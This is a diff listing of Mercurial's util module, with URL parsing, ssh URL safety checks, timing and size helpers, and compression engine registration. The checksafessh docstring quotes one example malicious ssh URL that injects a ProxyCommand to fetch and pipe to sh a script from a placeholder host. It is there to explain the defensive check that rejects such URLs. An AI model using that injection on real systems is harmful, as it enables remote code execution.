2739 2745 try:
2740 2746 return int(port)
2741 2747 except ValueError:
2742 2748 pass
2743 2749
2744 2750 try:
2745 2751 return socket.getservbyname(pycompat.sysstr(port))
2746 2752 except socket.error:
2747 2753 raise Abort(_("no port number associated with service '%s'") % port)
2748 2754
2749 2755 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2750 2756 '0': False, 'no': False, 'false': False, 'off': False,
2751 2757 'never': False}
2752 2758
2753 2759 def parsebool(s):
2754 2760 """Parse s into a boolean.
2755 2761
2756 2762 If s is not a valid boolean, returns None.
2757 2763 """
2758 2764 return _booleans.get(s.lower(), None)
2759 2765
2760 2766 _hextochr = dict((a + b, chr(int(a + b, 16)))
2761 2767 for a in string.hexdigits for b in string.hexdigits)
2762 2768
2763 2769 class url(object):
2764 2770 r"""Reliable URL parser.
2765 2771
2766 2772 This parses URLs and provides attributes for the following
2767 2773 components:
2768 2774
2769 2775 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2770 2776
2771 2777 Missing components are set to None. The only exception is
2772 2778 fragment, which is set to '' if present but empty.
2773 2779
2774 2780 If parsefragment is False, fragment is included in query. If
2775 2781 parsequery is False, query is included in path. If both are
2776 2782 False, both fragment and query are included in path.
2777 2783
2778 2784 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2779 2785
2780 2786 Note that for backward compatibility reasons, bundle URLs do not
2781 2787 take host names. That means 'bundle://../' has a path of '../'.
2782 2788
2783 2789 Examples:
2784 2790
2785 2791 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2786 2792 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2787 2793 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2788 2794 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2789 2795 >>> url(b'file:///home/joe/repo')
2790 2796 <url scheme: 'file', path: '/home/joe/repo'>
2791 2797 >>> url(b'file:///c:/temp/foo/')
2792 2798 <url scheme: 'file', path: 'c:/temp/foo/'>
2793 2799 >>> url(b'bundle:foo')
2794 2800 <url scheme: 'bundle', path: 'foo'>
2795 2801 >>> url(b'bundle://../foo')
2796 2802 <url scheme: 'bundle', path: '../foo'>
2797 2803 >>> url(br'c:\foo\bar')
2798 2804 <url path: 'c:\\foo\\bar'>
2799 2805 >>> url(br'\\blah\blah\blah')
2800 2806 <url path: '\\\\blah\\blah\\blah'>
2801 2807 >>> url(br'\\blah\blah\blah#baz')
2802 2808 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2803 2809 >>> url(br'file:///C:\users\me')
2804 2810 <url scheme: 'file', path: 'C:\\users\\me'>
2805 2811
2806 2812 Authentication credentials:
2807 2813
2808 2814 >>> url(b'ssh://joe:xyz@x/repo')
2809 2815 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2810 2816 >>> url(b'ssh://joe@x/repo')
2811 2817 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2812 2818
2813 2819 Query strings and fragments:
2814 2820
2815 2821 >>> url(b'http://host/a?b#c')
2816 2822 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2817 2823 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2818 2824 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2819 2825
2820 2826 Empty path:
2821 2827
2822 2828 >>> url(b'')
2823 2829 <url path: ''>
2824 2830 >>> url(b'#a')
2825 2831 <url path: '', fragment: 'a'>
2826 2832 >>> url(b'http://host/')
2827 2833 <url scheme: 'http', host: 'host', path: ''>
2828 2834 >>> url(b'http://host/#a')
2829 2835 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2830 2836
2831 2837 Only scheme:
2832 2838
2833 2839 >>> url(b'http:')
2834 2840 <url scheme: 'http'>
2835 2841 """
2836 2842
2837 2843 _safechars = "!~*'()+"
2838 2844 _safepchars = "/!~*'()+:\\"
2839 2845 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2840 2846
2841 2847 def __init__(self, path, parsequery=True, parsefragment=True):
2842 2848 # We slowly chomp away at path until we have only the path left
2843 2849 self.scheme = self.user = self.passwd = self.host = None
2844 2850 self.port = self.path = self.query = self.fragment = None
2845 2851 self._localpath = True
2846 2852 self._hostport = ''
2847 2853 self._origpath = path
2848 2854
2849 2855 if parsefragment and '#' in path:
2850 2856 path, self.fragment = path.split('#', 1)
2851 2857
2852 2858 # special case for Windows drive letters and UNC paths
2853 2859 if hasdriveletter(path) or path.startswith('\\\\'):
2854 2860 self.path = path
2855 2861 return
2856 2862
2857 2863 # For compatibility reasons, we can't handle bundle paths as
2858 2864 # normal URLS
2859 2865 if path.startswith('bundle:'):
2860 2866 self.scheme = 'bundle'
2861 2867 path = path[7:]
2862 2868 if path.startswith('//'):
2863 2869 path = path[2:]
2864 2870 self.path = path
2865 2871 return
2866 2872
2867 2873 if self._matchscheme(path):
2868 2874 parts = path.split(':', 1)
2869 2875 if parts[0]:
2870 2876 self.scheme, path = parts
2871 2877 self._localpath = False
2872 2878
2873 2879 if not path:
2874 2880 path = None
2875 2881 if self._localpath:
2876 2882 self.path = ''
2877 2883 return
2878 2884 else:
2879 2885 if self._localpath:
2880 2886 self.path = path
2881 2887 return
2882 2888
2883 2889 if parsequery and '?' in path:
2884 2890 path, self.query = path.split('?', 1)
2885 2891 if not path:
2886 2892 path = None
2887 2893 if not self.query:
2888 2894 self.query = None
2889 2895
2890 2896 # // is required to specify a host/authority
2891 2897 if path and path.startswith('//'):
2892 2898 parts = path[2:].split('/', 1)
2893 2899 if len(parts) > 1:
2894 2900 self.host, path = parts
2895 2901 else:
2896 2902 self.host = parts[0]
2897 2903 path = None
2898 2904 if not self.host:
2899 2905 self.host = None
2900 2906 # path of file:///d is /d
2901 2907 # path of file:///d:/ is d:/, not /d:/
2902 2908 if path and not hasdriveletter(path):
2903 2909 path = '/' + path
2904 2910
2905 2911 if self.host and '@' in self.host:
2906 2912 self.user, self.host = self.host.rsplit('@', 1)
2907 2913 if ':' in self.user:
2908 2914 self.user, self.passwd = self.user.split(':', 1)
2909 2915 if not self.host:
2910 2916 self.host = None
2911 2917
2912 2918 # Don't split on colons in IPv6 addresses without ports
2913 2919 if (self.host and ':' in self.host and
2914 2920 not (self.host.startswith('[') and self.host.endswith(']'))):
2915 2921 self._hostport = self.host
2916 2922 self.host, self.port = self.host.rsplit(':', 1)
2917 2923 if not self.host:
2918 2924 self.host = None
2919 2925
2920 2926 if (self.host and self.scheme == 'file' and
2921 2927 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2922 2928 raise Abort(_('file:// URLs can only refer to localhost'))
2923 2929
2924 2930 self.path = path
2925 2931
2926 2932 # leave the query string escaped
2927 2933 for a in ('user', 'passwd', 'host', 'port',
2928 2934 'path', 'fragment'):
2929 2935 v = getattr(self, a)
2930 2936 if v is not None:
2931 2937 setattr(self, a, urlreq.unquote(v))
2932 2938
2933 2939 @encoding.strmethod
2934 2940 def __repr__(self):
2935 2941 attrs = []
2936 2942 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2937 2943 'query', 'fragment'):
2938 2944 v = getattr(self, a)
2939 2945 if v is not None:
2940 2946 attrs.append('%s: %r' % (a, v))
2941 2947 return '<url %s>' % ', '.join(attrs)
2942 2948
2943 2949 def __bytes__(self):
2944 2950 r"""Join the URL's components back into a URL string.
2945 2951
2946 2952 Examples:
2947 2953
2948 2954 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2949 2955 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2950 2956 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2951 2957 'http://user:pw@host:80/?foo=bar&baz=42'
2952 2958 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2953 2959 'http://user:pw@host:80/?foo=bar%3dbaz'
2954 2960 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2955 2961 'ssh://user:pw@[::1]:2200//home/joe#'
2956 2962 >>> bytes(url(b'http://localhost:80//'))
2957 2963 'http://localhost:80//'
2958 2964 >>> bytes(url(b'http://localhost:80/'))
2959 2965 'http://localhost:80/'
2960 2966 >>> bytes(url(b'http://localhost:80'))
2961 2967 'http://localhost:80/'
2962 2968 >>> bytes(url(b'bundle:foo'))
2963 2969 'bundle:foo'
2964 2970 >>> bytes(url(b'bundle://../foo'))
2965 2971 'bundle:../foo'
2966 2972 >>> bytes(url(b'path'))
2967 2973 'path'
2968 2974 >>> bytes(url(b'file:///tmp/foo/bar'))
2969 2975 'file:///tmp/foo/bar'
2970 2976 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2971 2977 'file:///c:/tmp/foo/bar'
2972 2978 >>> print(url(br'bundle:foo\bar'))
2973 2979 bundle:foo\bar
2974 2980 >>> print(url(br'file:///D:\data\hg'))
2975 2981 file:///D:\data\hg
2976 2982 """
2977 2983 if self._localpath:
2978 2984 s = self.path
2979 2985 if self.scheme == 'bundle':
2980 2986 s = 'bundle:' + s
2981 2987 if self.fragment:
2982 2988 s += '#' + self.fragment
2983 2989 return s
2984 2990
2985 2991 s = self.scheme + ':'
2986 2992 if self.user or self.passwd or self.host:
2987 2993 s += '//'
2988 2994 elif self.scheme and (not self.path or self.path.startswith('/')
2989 2995 or hasdriveletter(self.path)):
2990 2996 s += '//'
2991 2997 if hasdriveletter(self.path):
2992 2998 s += '/'
2993 2999 if self.user:
2994 3000 s += urlreq.quote(self.user, safe=self._safechars)
2995 3001 if self.passwd:
2996 3002 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2997 3003 if self.user or self.passwd:
2998 3004 s += '@'
2999 3005 if self.host:
3000 3006 if not (self.host.startswith('[') and self.host.endswith(']')):
3001 3007 s += urlreq.quote(self.host)
3002 3008 else:
3003 3009 s += self.host
3004 3010 if self.port:
3005 3011 s += ':' + urlreq.quote(self.port)
3006 3012 if self.host:
3007 3013 s += '/'
3008 3014 if self.path:
3009 3015 # TODO: similar to the query string, we should not unescape the
3010 3016 # path when we store it, the path might contain '%2f' = '/',
3011 3017 # which we should *not* escape.
3012 3018 s += urlreq.quote(self.path, safe=self._safepchars)
3013 3019 if self.query:
3014 3020 # we store the query in escaped form.
3015 3021 s += '?' + self.query
3016 3022 if self.fragment is not None:
3017 3023 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3018 3024 return s
3019 3025
3020 3026 __str__ = encoding.strmethod(__bytes__)
3021 3027
3022 3028 def authinfo(self):
3023 3029 user, passwd = self.user, self.passwd
3024 3030 try:
3025 3031 self.user, self.passwd = None, None
3026 3032 s = bytes(self)
3027 3033 finally:
3028 3034 self.user, self.passwd = user, passwd
3029 3035 if not self.user:
3030 3036 return (s, None)
3031 3037 # authinfo[1] is passed to urllib2 password manager, and its
3032 3038 # URIs must not contain credentials. The host is passed in the
3033 3039 # URIs list because Python < 2.4.3 uses only that to search for
3034 3040 # a password.
3035 3041 return (s, (None, (s, self.host),
3036 3042 self.user, self.passwd or ''))
3037 3043
3038 3044 def isabs(self):
3039 3045 if self.scheme and self.scheme != 'file':
3040 3046 return True # remote URL
3041 3047 if hasdriveletter(self.path):
3042 3048 return True # absolute for our purposes - can't be joined()
3043 3049 if self.path.startswith(br'\\'):
3044 3050 return True # Windows UNC path
3045 3051 if self.path.startswith('/'):
3046 3052 return True # POSIX-style
3047 3053 return False
3048 3054
3049 3055 def localpath(self):
3050 3056 if self.scheme == 'file' or self.scheme == 'bundle':
3051 3057 path = self.path or '/'
3052 3058 # For Windows, we need to promote hosts containing drive
3053 3059 # letters to paths with drive letters.
3054 3060 if hasdriveletter(self._hostport):
3055 3061 path = self._hostport + '/' + self.path
3056 3062 elif (self.host is not None and self.path
3057 3063 and not hasdriveletter(path)):
3058 3064 path = '/' + path
3059 3065 return path
3060 3066 return self._origpath
3061 3067
3062 3068 def islocal(self):
3063 3069 '''whether localpath will return something that posixfile can open'''
3064 3070 return (not self.scheme or self.scheme == 'file'
3065 3071 or self.scheme == 'bundle')
3066 3072
3067 3073 def hasscheme(path):
3068 3074 return bool(url(path).scheme)
3069 3075
3070 3076 def hasdriveletter(path):
3071 3077 return path and path[1:2] == ':' and path[0:1].isalpha()
3072 3078
3073 3079 def urllocalpath(path):
3074 3080 return url(path, parsequery=False, parsefragment=False).localpath()
3075 3081
3076 3082 def checksafessh(path):
3077 3083 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3078 3084
3079 3085 This is a sanity check for ssh urls. ssh will parse the first item as
3080 3086 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3081 3087 Let's prevent these potentially exploited urls entirely and warn the
3082 3088 user.
3083 3089
3084 3090 Raises an error.Abort when the url is unsafe.
3085 3091 """
3086 3092 path = urlreq.unquote(path)
3087 3093 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3088 3094 raise error.Abort(_('potentially unsafe url: %r') %
3089 3095 (pycompat.bytestr(path),))
3090 3096
3091 3097 def hidepassword(u):
3092 3098 '''hide user credential in a url string'''
3093 3099 u = url(u)
3094 3100 if u.passwd:
3095 3101 u.passwd = '***'
3096 3102 return bytes(u)
3097 3103
3098 3104 def removeauth(u):
3099 3105 '''remove all authentication information from a url string'''
3100 3106 u = url(u)
3101 3107 u.user = u.passwd = None
3102 3108 return str(u)
3103 3109
3104 3110 timecount = unitcountfn(
3105 3111 (1, 1e3, _('%.0f s')),
3106 3112 (100, 1, _('%.1f s')),
3107 3113 (10, 1, _('%.2f s')),
3108 3114 (1, 1, _('%.3f s')),
3109 3115 (100, 0.001, _('%.1f ms')),
3110 3116 (10, 0.001, _('%.2f ms')),
3111 3117 (1, 0.001, _('%.3f ms')),
3112 3118 (100, 0.000001, _('%.1f us')),
3113 3119 (10, 0.000001, _('%.2f us')),
3114 3120 (1, 0.000001, _('%.3f us')),
3115 3121 (100, 0.000000001, _('%.1f ns')),
3116 3122 (10, 0.000000001, _('%.2f ns')),
3117 3123 (1, 0.000000001, _('%.3f ns')),
3118 3124 )
3119 3125
3120 3126 _timenesting = [0]
3121 3127
3122 3128 def timed(func):
3123 3129 '''Report the execution time of a function call to stderr.
3124 3130
3125 3131 During development, use as a decorator when you need to measure
3126 3132 the cost of a function, e.g. as follows:
3127 3133
3128 3134 @util.timed
3129 3135 def foo(a, b, c):
3130 3136 pass
3131 3137 '''
3132 3138
3133 3139 def wrapper(*args, **kwargs):
3134 3140 start = timer()
3135 3141 indent = 2
3136 3142 _timenesting[0] += indent
3137 3143 try:
3138 3144 return func(*args, **kwargs)
3139 3145 finally:
3140 3146 elapsed = timer() - start
3141 3147 _timenesting[0] -= indent
3142 3148 stderr.write('%s%s: %s\n' %
3143 3149 (' ' * _timenesting[0], func.__name__,
3144 3150 timecount(elapsed)))
3145 3151 return wrapper
3146 3152
3147 3153 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3148 3154 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3149 3155
3150 3156 def sizetoint(s):
3151 3157 '''Convert a space specifier to a byte count.
3152 3158
3153 3159 >>> sizetoint(b'30')
3154 3160 30
3155 3161 >>> sizetoint(b'2.2kb')
3156 3162 2252
3157 3163 >>> sizetoint(b'6M')
3158 3164 6291456
3159 3165 '''
3160 3166 t = s.strip().lower()
3161 3167 try:
3162 3168 for k, u in _sizeunits:
3163 3169 if t.endswith(k):
3164 3170 return int(float(t[:-len(k)]) * u)
3165 3171 return int(t)
3166 3172 except ValueError:
3167 3173 raise error.ParseError(_("couldn't parse size: %s") % s)
3168 3174
3169 3175 class hooks(object):
3170 3176 '''A collection of hook functions that can be used to extend a
3171 3177 function's behavior. Hooks are called in lexicographic order,
3172 3178 based on the names of their sources.'''
3173 3179
3174 3180 def __init__(self):
3175 3181 self._hooks = []
3176 3182
3177 3183 def add(self, source, hook):
3178 3184 self._hooks.append((source, hook))
3179 3185
3180 3186 def __call__(self, *args):
3181 3187 self._hooks.sort(key=lambda x: x[0])
3182 3188 results = []
3183 3189 for source, hook in self._hooks:
3184 3190 results.append(hook(*args))
3185 3191 return results
3186 3192
3187 3193 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3188 3194 '''Yields lines for a nicely formatted stacktrace.
3189 3195 Skips the 'skip' last entries, then return the last 'depth' entries.
3190 3196 Each file+linenumber is formatted according to fileline.
3191 3197 Each line is formatted according to line.
3192 3198 If line is None, it yields:
3193 3199 length of longest filepath+line number,
3194 3200 filepath+linenumber,
3195 3201 function
3196 3202
3197 3203 Not be used in production code but very convenient while developing.
3198 3204 '''
3199 3205 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3200 3206 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3201 3207 ][-depth:]
3202 3208 if entries:
3203 3209 fnmax = max(len(entry[0]) for entry in entries)
3204 3210 for fnln, func in entries:
3205 3211 if line is None:
3206 3212 yield (fnmax, fnln, func)
3207 3213 else:
3208 3214 yield line % (fnmax, fnln, func)
3209 3215
3210 3216 def debugstacktrace(msg='stacktrace', skip=0,
3211 3217 f=stderr, otherf=stdout, depth=0):
3212 3218 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3213 3219 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3214 3220 By default it will flush stdout first.
3215 3221 It can be used everywhere and intentionally does not require an ui object.
3216 3222 Not be used in production code but very convenient while developing.
3217 3223 '''
3218 3224 if otherf:
3219 3225 otherf.flush()
3220 3226 f.write('%s at:\n' % msg.rstrip())
3221 3227 for line in getstackframes(skip + 1, depth=depth):
3222 3228 f.write(line)
3223 3229 f.flush()
3224 3230
3225 3231 class dirs(object):
3226 3232 '''a multiset of directory names from a dirstate or manifest'''
3227 3233
3228 3234 def __init__(self, map, skip=None):
3229 3235 self._dirs = {}
3230 3236 addpath = self.addpath
3231 3237 if safehasattr(map, 'iteritems') and skip is not None:
3232 3238 for f, s in map.iteritems():
3233 3239 if s[0] != skip:
3234 3240 addpath(f)
3235 3241 else:
3236 3242 for f in map:
3237 3243 addpath(f)
3238 3244
3239 3245 def addpath(self, path):
3240 3246 dirs = self._dirs
3241 3247 for base in finddirs(path):
3242 3248 if base in dirs:
3243 3249 dirs[base] += 1
3244 3250 return
3245 3251 dirs[base] = 1
3246 3252
3247 3253 def delpath(self, path):
3248 3254 dirs = self._dirs
3249 3255 for base in finddirs(path):
3250 3256 if dirs[base] > 1:
3251 3257 dirs[base] -= 1
3252 3258 return
3253 3259 del dirs[base]
3254 3260
3255 3261 def __iter__(self):
3256 3262 return iter(self._dirs)
3257 3263
3258 3264 def __contains__(self, d):
3259 3265 return d in self._dirs
3260 3266
3261 3267 if safehasattr(parsers, 'dirs'):
3262 3268 dirs = parsers.dirs
3263 3269
3264 3270 def finddirs(path):
3265 3271 pos = path.rfind('/')
3266 3272 while pos != -1:
3267 3273 yield path[:pos]
3268 3274 pos = path.rfind('/', 0, pos)
3269 3275
3270 3276 # compression code
3271 3277
3272 3278 SERVERROLE = 'server'
3273 3279 CLIENTROLE = 'client'
3274 3280
3275 3281 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3276 3282 (u'name', u'serverpriority',
3277 3283 u'clientpriority'))
3278 3284
3279 3285 class compressormanager(object):
3280 3286 """Holds registrations of various compression engines.
3281 3287
3282 3288 This class essentially abstracts the differences between compression
3283 3289 engines to allow new compression formats to be added easily, possibly from
3284 3290 extensions.
3285 3291
3286 3292 Compressors are registered against the global instance by calling its
3287 3293 ``register()`` method.
3288 3294 """
3289 3295 def __init__(self):
3290 3296 self._engines = {}
3291 3297 # Bundle spec human name to engine name.
3292 3298 self._bundlenames = {}
3293 3299 # Internal bundle identifier to engine name.
3294 3300 self._bundletypes = {}
3295 3301 # Revlog header to engine name.
3296 3302 self._revlogheaders = {}
3297 3303 # Wire proto identifier to engine name.
3298 3304 self._wiretypes = {}
3299 3305
3300 3306 def __getitem__(self, key):
3301 3307 return self._engines[key]
3302 3308
3303 3309 def __contains__(self, key):
3304 3310 return key in self._engines
3305 3311
3306 3312 def __iter__(self):
3307 3313 return iter(self._engines.keys())
3308 3314
3309 3315 def register(self, engine):
3310 3316 """Register a compression engine with the manager.
3311 3317
3312 3318 The argument must be a ``compressionengine`` instance.
3313 3319 """
3314 3320 if not isinstance(engine, compressionengine):
3315 3321 raise ValueError(_('argument must be a compressionengine'))
3316 3322
3317 3323 name = engine.name()
3318 3324
3319 3325 if name in self._engines:
3320 3326 raise error.Abort(_('compression engine %s already registered') %
3321 3327 name)
3322 3328
3323 3329 bundleinfo = engine.bundletype()
3324 3330 if bundleinfo:
3325 3331 bundlename, bundletype = bundleinfo
3326 3332
3327 3333 if bundlename in self._bundlenames:
3328 3334 raise error.Abort(_('bundle name %s already registered') %
3329 3335 bundlename)
3330 3336 if bundletype in self._bundletypes:
3331 3337 raise error.Abort(_('bundle type %s already registered by %s') %
3332 3338 (bundletype, self._bundletypes[bundletype]))
3333 3339
3334 3340 # No external facing name declared.
3335 3341 if bundlename:
3336 3342 self._bundlenames[bundlename] = name
3337 3343
3338 3344 self._bundletypes[bundletype] = name
3339 3345
3340 3346 wiresupport = engine.wireprotosupport()
3341 3347 if wiresupport:
3342 3348 wiretype = wiresupport.name
3343 3349 if wiretype in self._wiretypes:
3344 3350 raise error.Abort(_('wire protocol compression %s already '
3345 3351 'registered by %s') %
3346 3352 (wiretype, self._wiretypes[wiretype]))
3347 3353
3348 3354 self._wiretypes[wiretype] = name
3349 3355
3350 3356 revlogheader = engine.revlogheader()
3351 3357 if revlogheader and revlogheader in self._revlogheaders:
3352 3358 raise error.Abort(_('revlog header %s already registered by %s') %
3353 3359 (revlogheader, self._revlogheaders[revlogheader]))
3354 3360
3355 3361 if revlogheader:
3356 3362 self._revlogheaders[revlogheader] = name
3357 3363
3358 3364 self._engines[name] = engine
3359 3365
3360 3366 @property
3361 3367 def supportedbundlenames(self):
3362 3368 return set(self._bundlenames.keys())
3363 3369
3364 3370 @property
3365 3371 def supportedbundletypes(self):
3366 3372 return set(self._bundletypes.keys())
3367 3373
3368 3374 def forbundlename(self, bundlename):
3369 3375 """Obtain a compression engine registered to a bundle name.
3370 3376
3371 3377 Will raise KeyError if the bundle type isn't registered.
3372 3378
3373 3379 Will abort if the engine is known but not available.
3374 3380 """
3375 3381 engine = self._engines[self._bundlenames[bundlename]]
3376 3382 if not engine.available():
3377 3383 raise error.Abort(_('compression engine %s could not be loaded') %
3378 3384 engine.name())
3379 3385 return engine
3380 3386
3381 3387 def forbundletype(self, bundletype):
3382 3388 """Obtain a compression engine registered to a bundle type.
3383 3389
3384 3390 Will raise KeyError if the bundle type isn't registered.
3385 3391
3386 3392 Will abort if the engine is known but not available.
3387 3393 """
3388 3394 engine = self._engines[self._bundletypes[bundletype]]
3389 3395 if not engine.available():
3390 3396 raise error.Abort(_('compression engine %s could not be loaded') %
3391 3397 engine.name())
3392 3398 return engine
3393 3399
3394 3400 def supportedwireengines(self, role, onlyavailable=True):
3395 3401 """Obtain compression engines that support the wire protocol.
3396 3402
3397 3403 Returns a list of engines in prioritized order, most desired first.
3398 3404
3399 3405 If ``onlyavailable`` is set, filter out engines that can't be
3400 3406 loaded.
3401 3407 """
3402 3408 assert role in (SERVERROLE, CLIENTROLE)
3403 3409
3404 3410 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3405 3411
3406 3412 engines = [self._engines[e] for e in self._wiretypes.values()]
3407 3413 if onlyavailable:
3408 3414 engines = [e for e in engines if e.available()]
3409 3415
3410 3416 def getkey(e):
3411 3417 # Sort first by priority, highest first. In case of tie, sort
3412 3418 # alphabetically. This is arbitrary, but ensures output is
3413 3419 # stable.
3414 3420 w = e.wireprotosupport()
3415 3421 return -1 * getattr(w, attr), w.name
3416 3422
3417 3423 return list(sorted(engines, key=getkey))
3418 3424
3419 3425 def forwiretype(self, wiretype):
3420 3426 engine = self._engines[self._wiretypes[wiretype]]
3421 3427 if not engine.available():
3422 3428 raise error.Abort(_('compression engine %s could not be loaded') %
3423 3429 engine.name())
3424 3430 return engine
3425 3431
3426 3432 def forrevlogheader(self, header):
3427 3433 """Obtain a compression engine registered to a revlog header.
3428 3434
3429 3435 Will raise KeyError if the revlog header value isn't registered.
3430 3436 """
3431 3437 return self._engines[self._revlogheaders[header]]
3432 3438
3433 3439 compengines = compressormanager()
3434 3440
3435 3441 class compressionengine(object):
3436 3442 """Base class for compression engines.
3437 3443
3438 3444 Compression engines must implement the interface defined by this class.
3439 3445 """
3440 3446 def name(self):
3441 3447 """Returns the name of the compression engine.
3442 3448
3443 3449 This is the key the engine is registered under.
3444 3450
3445 3451 This method must be implemented.
3446 3452 """
3447 3453 raise NotImplementedError()
3448 3454
3449 3455 def available(self):
3450 3456 """Whether the compression engine is available.
3451 3457
3452 3458 The intent of this method is to allow optional compression engines
3453 3459 that may not be available in all installations (such as engines relying
3454 3460 on C extensions that may not be present).
3455 3461 """
3456 3462 return True
3457 3463
3458 3464 def bundletype(self):
3459 3465 """Describes bundle identifiers for this engine.
3460 3466
3461 3467 If this compression engine isn't supported for bundles, returns None.
3462 3468
3463 3469 If this engine can be used for bundles, returns a 2-tuple of strings of
3464 3470 the user-facing "bundle spec" compression name and an internal
3465 3471 identifier used to denote the compression format within bundles. To
3466 3472 exclude the name from external usage, set the first element to ``None``.
3467 3473
3468 3474 If bundle compression is supported, the class must also implement
3469 3475 ``compressstream`` and `decompressorreader``.
3470 3476
3471 3477 The docstring of this method is used in the help system to tell users
3472 3478 about this engine.
3473 3479 """
3474 3480 return None
3475 3481
3476 3482 def wireprotosupport(self):
3477 3483 """Declare support for this compression format on the wire protocol.
3478 3484
3479 3485 If this compression engine isn't supported for compressing wire
3480 3486 protocol payloads, returns None.
3481 3487
3482 3488 Otherwise, returns ``compenginewireprotosupport`` with the following
3483 3489 fields:
3484 3490
3485 3491 * String format identifier
3486 3492 * Integer priority for the server
3487 3493 * Integer priority for the client
3488 3494
3489 3495 The integer priorities are used to order the advertisement of format
3490 3496 support by server and client. The highest integer is advertised
3491 3497 first. Integers with non-positive values aren't advertised.
3492 3498
3493 3499 The priority values are somewhat arbitrary and only used for default
3494 3500 ordering. The relative order can be changed via config options.
3495 3501
3496 3502 If wire protocol compression is supported, the class must also implement
3497 3503 ``compressstream`` and ``decompressorreader``.
3498 3504 """
3499 3505 return None
3500 3506
3501 3507 def revlogheader(self):
3502 3508 """Header added to revlog chunks that identifies this engine.
3503 3509
3504 3510 If this engine can be used to compress revlogs, this method should
3505 3511 return the bytes used to identify chunks compressed with this engine.
3506 3512 Else, the method should return ``None`` to indicate it does not
3507 3513 participate in revlog compression.
3508 3514 """
3509 3515 return None
3510 3516
3511 3517 def compressstream(self, it, opts=None):
3512 3518 """Compress an iterator of chunks.
3513 3519
3514 3520 The method receives an iterator (ideally a generator) of chunks of
3515 3521 bytes to be compressed. It returns an iterator (ideally a generator)
3516 3522 of bytes of chunks representing the compressed output.
3517 3523
3518 3524 Optionally accepts an argument defining how to perform compression.
3519 3525 Each engine treats this argument differently.
3520 3526 """
3521 3527 raise NotImplementedError()
3522 3528
3523 3529 def decompressorreader(self, fh):
3524 3530 """Perform decompression on a file object.
3525 3531
3526 3532 Argument is an object with a ``read(size)`` method that returns
3527 3533 compressed data. Return value is an object with a ``read(size)`` that
3528 3534 returns uncompressed data.
3529 3535 """
3530 3536 raise NotImplementedError()
3531 3537
3532 3538 def revlogcompressor(self, opts=None):
3533 3539 """Obtain an object that can be used to compress revlog entries.
3534 3540
3535 3541 The object has a ``compress(data)`` method that compresses binary
3536 3542 data. This method returns compressed binary data or ``None`` if
3537 3543 the data could not be compressed (too small, not compressible, etc).
3538 3544 The returned data should have a header uniquely identifying this
3539 3545 compression format so decompression can be routed to this engine.
3540 3546 This header should be identified by the ``revlogheader()`` return
3541 3547 value.
3542 3548
3543 3549 The object has a ``decompress(data)`` method that decompresses
3544 3550 data. The method will only be called if ``data`` begins with
3545 3551 ``revlogheader()``. The method should return the raw, uncompressed
3546 3552 data or raise a ``RevlogError``.
3547 3553
3548 3554 The object is reusable but is not thread safe.
3549 3555 """
3550 3556 raise NotImplementedError()
3551 3557
3552 3558 class _zlibengine(compressionengine):
3553 3559 def name(self):
3554 3560 return 'zlib'
3555 3561
3556 3562 def bundletype(self):
3557 3563 """zlib compression using the DEFLATE algorithm.
3558 3564
3559 3565 All Mercurial clients should support this format. The compression
3560 3566 algorithm strikes a reasonable balance between compression ratio
3561 3567 and size.
3562 3568 """
3563 3569 return 'gzip', 'GZ'
3564 3570
3565 3571 def wireprotosupport(self):
3566 3572 return compewireprotosupport('zlib', 20, 20)
3567 3573
3568 3574 def revlogheader(self):
3569 3575 return 'x'
3570 3576
3571 3577 def compressstream(self, it, opts=None):
3572 3578 opts = opts or {}
3573 3579
3574 3580 z = zlib.compressobj(opts.get('level', -1))
3575 3581 for chunk in it:
3576 3582 data = z.compress(chunk)
3577 3583 # Not all calls to compress emit data. It is cheaper to inspect
3578 3584 # here than to feed empty chunks through generator.
3579 3585 if data:
3580 3586 yield data
3581 3587
3582 3588 yield z.flush()
3583 3589
3584 3590 def decompressorreader(self, fh):
3585 3591 def gen():
3586 3592 d = zlib.decompressobj()
3587 3593 for chunk in filechunkiter(fh):
3588 3594 while chunk:
3589 3595 # Limit output size to limit memory.
3590 3596 yield d.decompress(chunk, 2 ** 18)
3591 3597 chunk = d.unconsumed_tail
3592 3598
3593 3599 return chunkbuffer(gen())
3594 3600
3595 3601 class zlibrevlogcompressor(object):
3596 3602 def compress(self, data):
